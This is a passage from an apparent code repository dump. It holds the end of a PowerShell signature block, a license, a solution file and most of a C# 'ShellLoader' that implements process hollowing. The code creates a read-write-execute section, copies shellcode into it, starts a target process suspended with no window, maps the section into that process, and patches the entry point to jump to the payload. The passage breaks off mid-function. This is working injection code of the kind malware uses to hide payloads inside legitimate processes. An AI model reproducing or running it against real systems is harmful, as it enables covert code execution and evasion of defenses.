a7LrZkPas7CM1ekN3fYBIM6ZMWM9CBoYs4GbT8aTEAb8B4H6i9r5gkn3Ym6hU/oS 453 | # lBiFLpKR6mhsRDKyZqHnGKSaZFHvMIIGajCCBVKgAwIBAgIQAwGaAjr/WLFr1tXq 454 | # 5hfwZjANBgkqhkiG9w0BAQUFADBiMQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGln 455 | # aUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29tMSEwHwYDVQQDExhE 456 | # aWdpQ2VydCBBc3N1cmVkIElEIENBLTEwHhcNMTQxMDIyMDAwMDAwWhcNMjQxMDIy 457 | # MDAwMDAwWjBHMQswCQYDVQQGEwJVUzERMA8GA1UEChMIRGlnaUNlcnQxJTAjBgNV 458 | # BAMTHERpZ2lDZXJ0IFRpbWVzdGFtcCBSZXNwb25kZXIwggEiMA0GCSqGSIb3DQEB 459 | # AQUAA4IBDwAwggEKAoIBAQCjZF38fLPggjXg4PbGKuZJdTvMbuBTqZ8fZFnmfGt/ 460 | # a4ydVfiS457VWmNbAklQ2YPOb2bu3cuF6V+l+dSHdIhEOxnJ5fWRn8YUOawk6qhL 461 | # LJGJzF4o9GS2ULf1ErNzlgpno75hn67z/RJ4dQ6mWxT9RSOOhkRVfRiGBYxVh3lI 462 | # RvfKDo2n3k5f4qi2LVkCYYhhchhoubh87ubnNC8xd4EwH7s2AY3vJ+P3mvBMMWSN 463 | # 4+v6GYeofs/sjAw2W3rBerh4x8kGLkYQyI3oBGDbvHN0+k7Y/qpA8bLOcEaD6dpA 464 | # oVk62RUJV5lWMJPzyWHM0AjMa+xiQpGsAsDvpPCJEY93AgMBAAGjggM1MIIDMTAO 465 | # BgNVHQ8BAf8EBAMCB4AwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEF 466 | # BQcDCDCCAb8GA1UdIASCAbYwggGyMIIBoQYJYIZIAYb9bAcBMIIBkjAoBggrBgEF 467 | # BQcCARYcaHR0cHM6Ly93d3cuZGlnaWNlcnQuY29tL0NQUzCCAWQGCCsGAQUFBwIC 468 | # MIIBVh6CAVIAQQBuAHkAIAB1AHMAZQAgAG8AZgAgAHQAaABpAHMAIABDAGUAcgB0 469 | # AGkAZgBpAGMAYQB0AGUAIABjAG8AbgBzAHQAaQB0AHUAdABlAHMAIABhAGMAYwBl 470 | # AHAAdABhAG4AYwBlACAAbwBmACAAdABoAGUAIABEAGkAZwBpAEMAZQByAHQAIABD 471 | # AFAALwBDAFAAUwAgAGEAbgBkACAAdABoAGUAIABSAGUAbAB5AGkAbgBnACAAUABh 472 | # AHIAdAB5ACAAQQBnAHIAZQBlAG0AZQBuAHQAIAB3AGgAaQBjAGgAIABsAGkAbQBp 473 | # AHQAIABsAGkAYQBiAGkAbABpAHQAeQAgAGEAbgBkACAAYQByAGUAIABpAG4AYwBv 474 | # AHIAcABvAHIAYQB0AGUAZAAgAGgAZQByAGUAaQBuACAAYgB5ACAAcgBlAGYAZQBy 475 | # AGUAbgBjAGUALjALBglghkgBhv1sAxUwHwYDVR0jBBgwFoAUFQASKxOYspkH7R7f 476 | # or5XDStnAs0wHQYDVR0OBBYEFGFaTSS2STKdSip5GoNL9B6Jwcp9MH0GA1UdHwR2 477 | # MHQwOKA2oDSGMmh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3Vy 478 | # ZWRJRENBLTEuY3JsMDigNqA0hjJodHRwOi8vY3JsNC5kaWdpY2VydC5jb20vRGln 479 | # aUNlcnRBc3N1cmVkSURDQS0xLmNybDB3BggrBgEFBQcBAQRrMGkwJAYIKwYBBQUH 480 | # MAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBBBggrBgEFBQcwAoY1aHR0cDov 481 | # L2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0QXNzdXJlZElEQ0EtMS5jcnQw 482 | # DQYJKoZIhvcNAQEFBQADggEBAJ0lfhszTbImgVybhs4jIA+Ah+WI//+x1GosMe06 483 | # FxlxF82pG7xaFjkAneNshORaQPveBgGMN/qbsZ0kfv4gpFetW7easGAm6mlXIV00 484 | # Lx9xsIOUGQVrNZAQoHuXx/Y/5+IRQaa9YtnwJz04HShvOlIJ8OxwYtNiS7Dgc6aS 485 | # wNOOMdgv420XEwbu5AO2FKvzj0OncZ0h3RTKFV2SQdr5D4HRmXQNJsQOfxu19aDx 486 | # xncGKBXp2JPlVRbwuwqrHNtcSCdmyKOLChzlldquxC5ZoGHd2vNtomHpigtt7BIY 487 | # vfdVVEADkitrwlHCCkivsNRu4PQUCjob4489yq9qjXvc2EQwggbNMIIFtaADAgEC 488 | # AhAG/fkDlgOt6gAK6z8nu7obMA0GCSqGSIb3DQEBBQUAMGUxCzAJBgNVBAYTAlVT 489 | # MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j 490 | # b20xJDAiBgNVBAMTG0RpZ2lDZXJ0IEFzc3VyZWQgSUQgUm9vdCBDQTAeFw0wNjEx 491 | # MTAwMDAwMDBaFw0yMTExMTAwMDAwMDBaMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQK 492 | # EwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNV 493 | # BAMTGERpZ2lDZXJ0IEFzc3VyZWQgSUQgQ0EtMTCCASIwDQYJKoZIhvcNAQEBBQAD 494 | # ggEPADCCAQoCggEBAOiCLZn5ysJClaWAc0Bw0p5WVFypxNJBBo/JM/xNRZFcgZ/t 495 | # LJz4FlnfnrUkFcKYubR3SdyJxArar8tea+2tsHEx6886QAxGTZPsi3o2CAOrDDT+ 496 | # GEmC/sfHMUiAfB6iD5IOUMnGh+s2P9gww/+m9/uizW9zI/6sVgWQ8DIhFonGcIj5 497 | # BZd9o8dD3QLoOz3tsUGj7T++25VIxO4es/K8DCuZ0MZdEkKB4YNugnM/JksUkK5Z 498 | # ZgrEjb7SzgaurYRvSISbT0C58Uzyr5j79s5AXVz2qPEvr+yJIvJrGGWxwXOt1/HY 499 | # zx4KdFxCuGh+t9V3CidWfA9ipD8yFGCV/QcEogkCAwEAAaOCA3owggN2MA4GA1Ud 500 | # DwEB/wQEAwIBhjA7BgNVHSUENDAyBggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUF 501 | # BwMDBggrBgEFBQcDBAYIKwYBBQUHAwgwggHSBgNVHSAEggHJMIIBxTCCAbQGCmCG 502 | # SAGG/WwAAQQwggGkMDoGCCsGAQUFBwIBFi5odHRwOi8vd3d3LmRpZ2ljZXJ0LmNv 503 | # bS9zc2wtY3BzLXJlcG9zaXRvcnkuaHRtMIIBZAYIKwYBBQUHAgIwggFWHoIBUgBB 504 | # AG4AeQAgAHUAcwBlACAAbwBmACAAdABoAGkAcwAgAEMAZQByAHQAaQBmAGkAYwBh 505 | # AHQAZQAgAGMAbwBuAHMAdABpAHQAdQB0AGUAcwAgAGEAYwBjAGUAcAB0AGEAbgBj 506 | # AGUAIABvAGYAIAB0AGgAZQAgAEQAaQBnAGkAQwBlAHIAdAAgAEMAUAAvAEMAUABT 507 | # ACAAYQBuAGQAIAB0AGgAZQAgAFIAZQBsAHkAaQBuAGcAIABQAGEAcgB0AHkAIABB 508 | # AGcAcgBlAGUAbQBlAG4AdAAgAHcAaABpAGMAaAAgAGwAaQBtAGkAdAAgAGwAaQBh 509 | # AGIAaQBsAGkAdAB5ACAAYQBuAGQAIABhAHIAZQAgAGkAbgBjAG8AcgBwAG8AcgBh 510 | # AHQAZQBkACAAaABlAHIAZQBpAG4AIABiAHkAIAByAGUAZgBlAHIAZQBuAGMAZQAu 511 | # MAsGCWCGSAGG/WwDFTASBgNVHRMBAf8ECDAGAQH/AgEAMHkGCCsGAQUFBwEBBG0w 512 | # azAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEMGCCsGAQUF 513 | # BzAChjdodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRBc3N1cmVk 514 | # SURSb290Q0EuY3J0MIGBBgNVHR8EejB4MDqgOKA2hjRodHRwOi8vY3JsMy5kaWdp 515 | # Y2VydC5jb20vRGlnaUNlcnRBc3N1cmVkSURSb290Q0EuY3JsMDqgOKA2hjRodHRw 516 | # Oi8vY3JsNC5kaWdpY2VydC5jb20vRGlnaUNlcnRBc3N1cmVkSURSb290Q0EuY3Js 517 | # MB0GA1UdDgQWBBQVABIrE5iymQftHt+ivlcNK2cCzTAfBgNVHSMEGDAWgBRF66Kv 518 | # 9JLLgjEtUYunpyGd823IDzANBgkqhkiG9w0BAQUFAAOCAQEARlA+ybcoJKc4HbZb 519 | # Ka9Sz1LpMUerVlx71Q0LQbPv7HUfdDjyslxhopyVw1Dkgrkj0bo6hnKtOHisdV0X 520 | # FzRyR4WUVtHruzaEd8wkpfMEGVWp5+Pnq2LN+4stkMLA0rWUvV5PsQXSDj0aqRRb 521 | # poYxYqioM+SbOafE9c4deHaUJXPkKqvPnHZL7V/CSxbkS3BMAIke/MV5vEwSV/5f 522 | # 4R68Al2o/vsHOE8Nxl2RuQ9nRc3Wg+3nkg2NsWmMT/tZ4CMP0qquAHzunEIOz5HX 523 | # J7cW7g/DvXwKoO4sCFWFIrjrGBpN/CohrUkxg0eVd3HcsRtLSxwQnHcUwZ1PL1qV 524 | # CCkQJjGCBEwwggRIAgEBMIGGMHIxCzAJBgNVBAYTAlVTMRUwEwYDVQQKEwxEaWdp 525 | # Q2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xMTAvBgNVBAMTKERp 526 | # Z2lDZXJ0IFNIQTIgQXNzdXJlZCBJRCBDb2RlIFNpZ25pbmcgQ0ECEAGfcm2O2qyx 527 | # DgPgWB72KpowDQYJYIZIAWUDBAIBBQCggYQwGAYKKwYBBAGCNwIBDDEKMAigAoAA 528 | # oQKAADAZBgkqhkiG9w0BCQMxDAYKKwYBBAGCNwIBBDAcBgorBgEEAYI3AgELMQ4w 529 | # DAYKKwYBBAGCNwIBFTAvBgkqhkiG9w0BCQQxIgQgCCPKt4WoiY1sbAfnZKmxtY0e 530 | # oDPZ+qZBOsAu+KHmiGQwDQYJKoZIhvcNAQEBBQAEggEAwBaoh3PcM+OcihX5zILU 531 | # 8lE2Ph0f3sEPqmr/5Tzs/S6XDZqy2ux/Uh3sDLcsdk9gywFhBOr2g0G4AFucN+N/ 532 | # E6LFPKPS1po34+wK6w7Z8mcRU+7vNyxPxc7Lycm2HzefwYaFcSA6xbAhHvNiNLd+ 533 | # 1/BumSqlJPBwdDr9H4Ri86CSYj7xRDpafZ6WncqgAMaXsYWsTiwbbiekIcExvZgg 534 | # BnQ3fEDNBdmK0WZCdZX93DZEYKLdSH6r6lSWRW5IHgzlCWL5OP415GzkHgxthx2m 535 | # utxvJHuF+LpZfDACQswPX61XwGo61Y6qX+l7g4clG5SeFoK8wbgrR12P4EgECKzy 536 | # 66GCAg8wggILBgkqhkiG9w0BCQYxggH8MIIB+AIBATB2MGIxCzAJBgNVBAYTAlVT 537 | # MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j 538 | # b20xITAfBgNVBAMTGERpZ2lDZXJ0IEFzc3VyZWQgSUQgQ0EtMQIQAwGaAjr/WLFr 539 | # 1tXq5hfwZjAJBgUrDgMCGgUAoF0wGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAc 540 | # BgkqhkiG9w0BCQUxDxcNMTYwOTExMTkwMzE5WjAjBgkqhkiG9w0BCQQxFgQUBFvE 541 | # Qx3Ondofr5v3IdqidXufRVUwDQYJKoZIhvcNAQEBBQAEggEANXU9soYMqHDm1v0E 542 | # QcIMRTYPkv2xB/xDIc4JmhfFKMO3SUDA1m6lS2w6WWbhNu0GRTFT2Bed712y8qXI 543 | # t9uO1BDTxDyl0lBYAKjUDnWI17cZpHEcx5snT1D2CYv29TfOpH9/+gzlddWrdB9q 544 | # VTcEo1/hFH0B4ffgE8YNcw4jg+e7b3nKpGjBDwr6SqMWwTZv37qj/xvLubtzEKEi 545 | # i1g6VG4tnvWcH2TD5bGmtzLZ8N1fyktdju8B5oscnSYeiX/Z26ZM2JN8coHNSW1k 546 | # krCJqqlTJrihEOvqs/NiDKyq1lBh3Es/o6LaNxYDeHr/8ntIqfMpbI6ZB+7RW0XC 547 | # B6o+Cw== 548 | # SIG # End signature block 549 | -------------------------------------------------------------------------------- /ProcessHollowing/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, Aaron 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /ProcessHollowing/ProcHollow.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.26730.12 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TestApp", "TestApp\TestApp.csproj", "{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}" 7 | EndProject 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ShellLoader", "ShellLoader\ShellLoader.csproj", "{B8282841-0368-48B9-98EB-53BD511422D9}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Debug|ARM = Debug|ARM 14 | Debug|x64 = Debug|x64 15 | Debug|x86 = Debug|x86 16 | Release|Any CPU = Release|Any CPU 17 | Release|ARM = Release|ARM 18 | Release|x64 = Release|x64 19 | Release|x86 = Release|x86 20 | EndGlobalSection 21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 22 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 23 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|Any CPU.Build.0 = Debug|Any CPU 24 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|ARM.ActiveCfg = Debug|Any CPU 25 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|ARM.Build.0 = Debug|Any CPU 26 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|x64.ActiveCfg = Debug|Any CPU 27 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|x64.Build.0 = Debug|Any CPU 28 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|x86.ActiveCfg = Debug|Any CPU 29 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|x86.Build.0 = Debug|Any CPU 30 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|Any CPU.ActiveCfg = Release|Any CPU 31 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|Any CPU.Build.0 = Release|Any CPU 32 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|ARM.ActiveCfg = Release|Any CPU 33 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|ARM.Build.0 = Release|Any CPU 34 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|x64.ActiveCfg = Release|Any CPU 35 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|x64.Build.0 = Release|Any CPU 36 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|x86.ActiveCfg = Release|Any CPU 37 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|x86.Build.0 = Release|Any CPU 38 | {B8282841-0368-48B9-98EB-53BD511422D9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 39 | {B8282841-0368-48B9-98EB-53BD511422D9}.Debug|Any CPU.Build.0 = Debug|Any CPU 40 | {B8282841-0368-48B9-98EB-53BD511422D9}.Debug|ARM.ActiveCfg = Debug|Any CPU 41 | {B8282841-0368-48B9-98EB-53BD511422D9}.Debug|ARM.Build.0 = Debug|Any CPU 42 | {B8282841-0368-48B9-98EB-53BD511422D9}.Debug|x64.ActiveCfg = Debug|Any CPU 43 | {B8282841-0368-48B9-98EB-53BD511422D9}.Debug|x64.Build.0 = Debug|Any CPU 44 | {B8282841-0368-48B9-98EB-53BD511422D9}.Debug|x86.ActiveCfg = Debug|Any CPU 45 | {B8282841-0368-48B9-98EB-53BD511422D9}.Debug|x86.Build.0 = Debug|Any CPU 46 | {B8282841-0368-48B9-98EB-53BD511422D9}.Release|Any CPU.ActiveCfg = Release|Any CPU 47 | {B8282841-0368-48B9-98EB-53BD511422D9}.Release|Any CPU.Build.0 = Release|Any CPU 48 | {B8282841-0368-48B9-98EB-53BD511422D9}.Release|ARM.ActiveCfg = Release|Any CPU 49 | {B8282841-0368-48B9-98EB-53BD511422D9}.Release|ARM.Build.0 = Release|Any CPU 50 | {B8282841-0368-48B9-98EB-53BD511422D9}.Release|x64.ActiveCfg = Release|Any CPU 51 | {B8282841-0368-48B9-98EB-53BD511422D9}.Release|x64.Build.0 = Release|Any CPU 52 | {B8282841-0368-48B9-98EB-53BD511422D9}.Release|x86.ActiveCfg = Release|Any CPU 53 | {B8282841-0368-48B9-98EB-53BD511422D9}.Release|x86.Build.0 = Release|Any CPU 54 | EndGlobalSection 55 | GlobalSection(SolutionProperties) = preSolution 56 | HideSolutionNode = FALSE 57 | EndGlobalSection 58 | GlobalSection(ExtensibilityGlobals) = postSolution 59 | SolutionGuid = {82E493BC-58E8-4793-84B6-6C54274E5952} 60 | EndGlobalSection 61 | EndGlobal 62 | -------------------------------------------------------------------------------- /ProcessHollowing/ShellLoader/Loader.cs: -------------------------------------------------------------------------------- 1 | /*************** 2 | * 3 | * Simple Process Hollowing in C# 4 | * 5 | * @author: Aaron Bray 6 | * @github: github.com/ambray 7 | * 8 | **************/ 9 | 10 | using System; 11 | using System.Collections.Generic; 12 | using System.Runtime.InteropServices; 13 | 14 | namespace ShellLoader 15 | { 16 | public sealed class Loader 17 | { 18 | 19 | 20 | [StructLayout(LayoutKind.Sequential)] 21 | public struct PROCESS_INFORMATION 22 | { 23 | public IntPtr hProcess; 24 | public IntPtr hThread; 25 | public int dwProcessId; 26 | public int dwThreadId; 27 | } 28 | 29 | [StructLayout(LayoutKind.Sequential)] 30 | internal struct PROCESS_BASIC_INFORMATION 31 | { 32 | public IntPtr Reserved1; 33 | public IntPtr PebAddress; 34 | public IntPtr Reserved2; 35 | public IntPtr Reserved3; 36 | public IntPtr UniquePid; 37 | public IntPtr MoreReserved; 38 | } 39 | 40 | [StructLayout(LayoutKind.Sequential)] 41 | internal struct STARTUPINFO 42 | { 43 | uint cb; 44 | IntPtr lpReserved; 45 | IntPtr lpDesktop; 46 | IntPtr lpTitle; 47 | uint dwX; 48 | uint dwY; 49 | uint dwXSize; 50 | uint dwYSize; 51 | uint dwXCountChars; 52 | uint dwYCountChars; 53 | uint dwFillAttributes; 54 | uint dwFlags; 55 | ushort wShowWindow; 56 | ushort cbReserved; 57 | IntPtr lpReserved2; 58 | IntPtr hStdInput; 59 | IntPtr hStdOutput; 60 | IntPtr hStdErr; 61 | } 62 | 63 | public const uint PageReadWriteExecute = 0x40; 64 | public const uint PageReadWrite = 0x04; 65 | public const uint PageExecuteRead = 0x20; 66 | public const uint MemCommit = 0x00001000; 67 | public const uint SecCommit = 0x08000000; 68 | public const uint GenericAll = 0x10000000; 69 | public const uint CreateSuspended = 0x00000004; 70 | public const uint DetachedProcess = 0x00000008; 71 | public const uint CreateNoWindow = 0x08000000; 72 | 73 | [DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)] 74 | private static extern int ZwCreateSection(ref IntPtr section, uint desiredAccess, IntPtr pAttrs, ref LARGE_INTEGER pMaxSize, uint pageProt, uint allocationAttribs, IntPtr hFile); 75 | 76 | [DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)] 77 | private static extern int ZwMapViewOfSection(IntPtr section, IntPtr process, ref IntPtr baseAddr, IntPtr zeroBits, IntPtr commitSize, IntPtr stuff, ref IntPtr viewSize, int inheritDispo, uint alloctype, uint prot); 78 | 79 | [DllImport("Kernel32.dll", CallingConvention = CallingConvention.StdCall)] 80 | private static extern void GetSystemInfo(ref SYSTEM_INFO lpSysInfo); 81 | 82 | [DllImport("Kernel32.dll", CallingConvention = CallingConvention.StdCall)] 83 | private static extern IntPtr GetCurrentProcess(); 84 | 85 | [DllImport("Kernel32.dll", CallingConvention = CallingConvention.StdCall)] 86 | private static extern void CloseHandle(IntPtr handle); 87 | 88 | [DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)] 89 | private static extern int ZwUnmapViewOfSection(IntPtr hSection, IntPtr address); 90 | 91 | [DllImport("Kernel32.dll", SetLastError = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)] 92 | private static extern bool CreateProcess(IntPtr lpApplicationName, string lpCommandLine, IntPtr lpProcAttribs, IntPtr lpThreadAttribs, bool bInheritHandles, uint dwCreateFlags, IntPtr lpEnvironment, IntPtr lpCurrentDir, [In] ref STARTUPINFO lpStartinfo, out PROCESS_INFORMATION lpProcInformation); 93 | 94 | [DllImport("kernel32.dll")] 95 | static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 96 | 97 | [DllImport("kernel32.dll", SetLastError = true)] 98 | private static extern uint ResumeThread(IntPtr hThread); 99 | 100 | [DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)] 101 | private static extern int ZwQueryInformationProcess(IntPtr hProcess, int procInformationClass, ref PROCESS_BASIC_INFORMATION procInformation, uint ProcInfoLen, ref uint retlen); 102 | 103 | [DllImport("kernel32.dll", SetLastError = true)] 104 | static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead); 105 | 106 | 107 | [DllImport("kernel32.dll", SetLastError = true, CallingConvention = CallingConvention.StdCall)] 108 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, IntPtr nSize, out IntPtr lpNumWritten); 109 | 110 | 111 | [DllImport("kernel32.dll")] 112 | static extern uint GetLastError(); 113 | 114 | [StructLayout(LayoutKind.Sequential)] 115 | public struct SYSTEM_INFO 116 | { 117 | public uint dwOem; 118 | public uint dwPageSize; 119 | public IntPtr lpMinAppAddress; 120 | public IntPtr lpMaxAppAddress; 121 | public IntPtr dwActiveProcMask; 122 | public uint dwNumProcs; 123 | public uint dwProcType; 124 | public uint dwAllocGranularity; 125 | public ushort wProcLevel; 126 | public ushort wProcRevision; 127 | } 128 | 129 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 130 | public struct LARGE_INTEGER 131 | { 132 | public uint LowPart; 133 | public int HighPart; 134 | } 135 | 136 | IntPtr section_; 137 | IntPtr localmap_; 138 | IntPtr remotemap_; 139 | IntPtr localsize_; 140 | IntPtr remotesize_; 141 | IntPtr pModBase_; 142 | IntPtr pEntry_; 143 | uint rvaEntryOffset_; 144 | uint size_; 145 | byte[] inner_; 146 | 147 | public uint round_to_page(uint size) 148 | { 149 | SYSTEM_INFO info = new SYSTEM_INFO(); 150 | 151 | GetSystemInfo(ref info); 152 | 153 | return (info.dwPageSize - size % info.dwPageSize) + size; 154 | } 155 | 156 | const int AttributeSize = 24; 157 | 158 | private bool nt_success(long v) 159 | { 160 | return (v >= 0); 161 | } 162 | 163 | public IntPtr GetCurrent() 164 | { 165 | return GetCurrentProcess(); 166 | } 167 | 168 | 169 | 170 | /*** 171 | * Maps a view of the current section into the process specified in procHandle. 172 | */ 173 | public KeyValuePair MapSection(IntPtr procHandle, uint protect, IntPtr addr) 174 | { 175 | IntPtr baseAddr = addr; 176 | IntPtr viewSize = (IntPtr)size_; 177 | 178 | 179 | var status = ZwMapViewOfSection(section_, procHandle, ref baseAddr, (IntPtr)0, (IntPtr)0, (IntPtr)0, ref viewSize, 1, 0, protect); 180 | 181 | if (!nt_success(status)) 182 | throw new SystemException("[x] Something went wrong! " + status); 183 | 184 | return new KeyValuePair(baseAddr, viewSize); 185 | } 186 | 187 | /*** 188 | * Attempts to create an RWX section of the given size 189 | */ 190 | public bool CreateSection(uint size) 191 | { 192 | LARGE_INTEGER liVal = new LARGE_INTEGER(); 193 | size_ = round_to_page(size); 194 | liVal.LowPart = size_; 195 | 196 | var status = ZwCreateSection(ref section_, GenericAll, (IntPtr)0, ref liVal, PageReadWriteExecute, SecCommit, (IntPtr)0); 197 | 198 | return nt_success(status); 199 | } 200 | 201 | 202 | 203 | /*** 204 | * Maps a view of the section into the current process 205 | */ 206 | public void SetLocalSection(uint size) 207 | { 208 | 209 | var vals = MapSection(GetCurrent(), PageReadWriteExecute, IntPtr.Zero); 210 | if (vals.Key == (IntPtr)0) 211 | throw new SystemException("[x] Failed to map view of section!"); 212 | 213 | localmap_ = vals.Key; 214 | localsize_ = vals.Value; 215 | 216 | } 217 | 218 | /*** 219 | * Copies the shellcode buffer into the section 220 | */ 221 | public void CopyShellcode(byte[] buf) 222 | { 223 | var lsize = size_; 224 | if (buf.Length > lsize) 225 | throw new IndexOutOfRangeException("[x] Shellcode buffer is too long!"); 226 | 227 | unsafe 228 | { 229 | byte* p = (byte*)localmap_; 230 | 231 | for (int i = 0; i < buf.Length; i++) 232 | { 233 | p[i] = buf[i]; 234 | } 235 | } 236 | } 237 | 238 | /*** 239 | * Create a new process using the binary located at "path", starting up suspended. 240 | */ 241 | public PROCESS_INFORMATION StartProcess(string path) 242 | { 243 | STARTUPINFO startInfo = new STARTUPINFO(); 244 | PROCESS_INFORMATION procInfo = new PROCESS_INFORMATION(); 245 | 246 | uint flags = CreateSuspended | DetachedProcess | CreateNoWindow; 247 | 248 | if (!CreateProcess((IntPtr)0, path, (IntPtr)0, (IntPtr)0, true, flags, (IntPtr)0, (IntPtr)0, ref startInfo, out procInfo)) 249 | throw new SystemException("[x] Failed to create process!"); 250 | 251 | 252 | return procInfo; 253 | } 254 | 255 | const ulong PatchSize = 0x10; 256 | 257 | /*** 258 | * Constructs the shellcode patch for the new process entry point. It will build either an x86 or x64 payload based 259 | * on the current pointer size. 260 | * Ultimately, we will jump to the shellcode payload 261 | */ 262 | public KeyValuePair BuildEntryPatch(IntPtr dest) 263 | { 264 | int i = 0; 265 | IntPtr ptr; 266 | 267 | ptr = Marshal.AllocHGlobal((IntPtr)PatchSize); 268 | 269 | unsafe 270 | { 271 | 272 | var p = (byte*)ptr; 273 | byte[] tmp = null; 274 | 275 | if (IntPtr.Size == 4) 276 | { 277 | p[i] = 0xb8; // mov eax, 278 | i++; 279 | var val = (Int32)dest; 280 | tmp = BitConverter.GetBytes(val); 281 | } 282 | else 283 | { 284 | p[i] = 0x48; // rex 285 | i++; 286 | p[i] = 0xb8; // mov rax, 287 | i++; 288 | 289 | var val = (Int64)dest; 290 | tmp = BitConverter.GetBytes(val); 291 | } 292 | 293 | for (int j = 0; j < IntPtr.Size; j++) 294 | p[i + j] = tmp[j]; 295 | 296 | i += IntPtr.Size; 297 | p[i] = 0xff; 298 | i++; 299 | p[i] = 0xe0; // jmp [r|e]ax 300 | i++; 301 | } 302 | 303 | return new KeyValuePair(i, ptr); 304 | } 305 | 306 | 307 | /** 308 | * We will locate the entry point for the main module in the remote process for patching. 309 | */ 310 | private IntPtr GetEntryFromBuffer(byte[] buf) 311 | { 312 | IntPtr res = IntPtr.Zero; 313 | unsafe 314 | { 315 | fixed (byte* p = buf) 316 | { 317 | uint e_lfanew_offset = *((uint*)(p + 0x3c)); // e_lfanew offset in IMAGE_DOS_HEADERS 318 | 319 | byte* nthdr = (p + e_lfanew_offset); 320 | 321 | byte* opthdr = (nthdr + 0x18); // IMAGE_OPTIONAL_HEADER start 322 | 323 | ushort t = *((ushort*)opthdr); 324 | 325 | byte* entry_ptr = (opthdr + 0x10); // entry point 